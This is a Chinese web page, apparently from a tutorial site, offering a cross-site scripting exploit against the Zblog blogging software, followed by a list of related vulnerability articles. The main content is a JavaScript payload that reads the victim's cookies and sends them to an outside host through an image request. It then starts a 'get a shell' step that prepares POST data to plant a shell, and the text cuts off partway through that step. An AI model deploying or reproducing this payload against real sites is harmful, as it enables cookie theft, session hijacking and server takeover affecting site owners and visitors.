手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >Zblog最新跨站漏洞及利用代码
Zblog最新跨站漏洞及利用代码
摘要:Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向xmlhttp=poster();cookie=document.co...

Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向

xmlhttp=poster();

cookie=document.cookie;

login=cookie.indexOf(‘password’)==-1?0:1;

tolocation=’/’;

//get cookie

x=new Image();

x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);

//get a shell

data=”txaContent=

【Zblog最新跨站漏洞及利用代码】相关文章:

Z-blog跨站脚本攻击漏洞

腾讯QQ空间的跨站漏洞介绍以及修复解决的方案(图)

ewebeditor通杀鸡肋0day漏洞

最新win2003 II6解析漏洞实战及应用

IBM Rational ClearQuest 跨站脚本漏洞

IPB2注入漏洞的深入利用

Mambo index.php文件多个跨站脚本执行漏洞

360安全浏览器本地xss跨域漏洞

入侵检测系统漏洞的分析

RealPlayer又曝新漏洞

精品推荐
分类导航